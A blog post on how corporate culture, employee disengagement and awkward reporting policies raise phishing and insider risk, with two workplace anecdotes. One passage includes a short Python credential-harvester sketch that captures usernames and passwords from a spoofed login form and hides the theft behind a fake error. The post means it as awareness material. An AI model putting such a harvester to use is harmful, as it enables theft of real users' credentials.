Your Corporate Culture is Affecting Your Cybersecurity
As a cybersecurity professional, I love considering the different ways in which I can breach or affect the operation of an environment. While spending on cybersecurity technologies has increased steadily since 2011, breaches have also been increasing. So while these investments in security controls are helping reduce risk, businesses are still falling short on one of their biggest points of exposure: their users.
The human factor is a generally unpredictable component when it comes to user security. Strong policies can help users better understand the rules of the road, but when the time comes to test their understanding, compliance can often come down to the user's state of mind. While ongoing awareness programs and user testing are one piece of the puzzle in making the human factor more predictable, the company's culture also needs to be assessed.
Developing Insider Threats
How do your users feel about their job? Are they confident, stressed, frustrated, or depressed? How are things going for them at home? Do they feel trusted? Do they feel like they belong in the company? Does your company encourage a positive environment? Do they find value in their work? How did they respond to security training?
These are just a few of the questions you'd likely think are for Human Resources, but knowing the health of the company's culture can go far in evaluating the risk that users may get involved in a security incident. Users who are engaged with the business, involved in the culture, and driven by a shared interest in your mission will be strong defenders. When users place less value on their work environment, they will be less likely to call upon their security training, overriding their sense of suspicion and contributing to increased risk.
Situational Example
After a recent training cycle at a firm, users thought it would be amusing to click the links in a phishing campaign email and enter their credentials. These users disarmed their suspicion because other users claimed a test was being conducted. The security team denied this, but the users decided they knew better. A simple DNS redirect could have turned this into a catastrophe.
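To make the stakes concrete, here is a minimal sketch of how little infrastructure an attacker needs once users willingly type credentials into a phished page. This is an illustration for awareness purposes only, not a real incident artifact; the handler name, form field names, and response text are all assumptions for the demo. A DNS redirect pointing the clicked link at a listener like this is all that separates a "joke" click from a real credential harvest.

```python
# Hypothetical sketch (illustration only): a bare-bones credential
# harvester. Every name here (FakeLoginHandler, "username"/"password"
# form fields) is an assumption for the demo, not from the incident.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

harvested = []  # credentials captured from the spoofed login form


class FakeLoginHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        # Read and parse the submitted login form.
        length = int(self.headers.get("Content-Length", 0))
        form = parse_qs(self.rfile.read(length).decode())
        # Record whatever the victim typed into the fake page.
        harvested.append({
            "user": form.get("username", [""])[0],
            "password": form.get("password", [""])[0],
        })
        # Reply with a bland error so the victim shrugs and retries
        # on the real site, none the wiser.
        body = b"Service temporarily unavailable. Please try again later."
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the listener quiet
```

The point is not the code itself but how short it is: the "test" the users assumed was happening and a genuine attack are indistinguishable from their side of the browser.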
Users who are disengaged from the environment, or overconfident in their own abilities, will be less likely to react to, or even properly complete, the training programs designed to raise their awareness, increasing risk.
Situational Example
After a recent training cycle at a firm, one of their best employees decided they knew better and didn't need the security training. During the training they did not pay attention and attempted to skip through just to get a status of completed. Weeks later, this user was compromised after checking a phishing link against a virus-detection site, falsely assuming that "no virus" meant "not phishing."
As you can imagine, these are just a few of the ways your users can become an insider threat without having any explicitly malicious intent. So the next time you have an opportunity to evaluate your risk, be sure to consider your culture as well. Consider how you handle diversity and inclusion, toxic environments, user complaints and requests, and how well users comprehend your policies.
The Policy Paradox
There is no disputing that strong security policies can be a good foundation for implementing physical controls and developing workflows that are more mindful of risk. Good policies can give our users confidence in the actions they take every day and guide them to doing their part in keeping the business secure. Policies, though, can also create risks that often go unconsidered.
When users run into a potential security incident, time matters. Policies that impose overly complicated reporting mechanisms will demotivate users from reporting issues because they don't want the hassle. If the policy adds components that are open to interpretation, users will lose confidence in their ability to report. The process for reporting should be as efficient as possible for the user. If this means you have to develop a layer to qualify and quantify the risk, then invest in that so users can feel more confident.
If strict policies begin to inhibit business processes, users will be tempted to bypass them to achieve a particular action or goal. Businesses often respond to these situations with adverse action against the user and then move on to the next situation. Instead, this may be a prime opportunity for a discussion about why a user circumvented security controls or practices. Taking the time to investigate that feedback, and working to determine ways to reduce a particular policy's impact on your users, if appropriate, will not only improve relations with users but will keep the business moving. Security should never be seen as a business obstruction.
There's one more point to make on business culture. Your IT and security team(s) should treat every interaction with users as an opportunity to make an impression. Users who get negative responses to a false or incorrect report will be less likely to report future incidents. Users can often feel nervous about reporting situations, so doing our part to ease that fear will promote user engagement. Even in the case of a confirmed incident, it's important to focus on the facts and understand how we could have done better, long before any consideration is made of blaming a user.
Hopefully you've found a few concepts in this post that can help you further evaluate the human risks in your environment that can affect your security strategies. Have others to add? Comment below!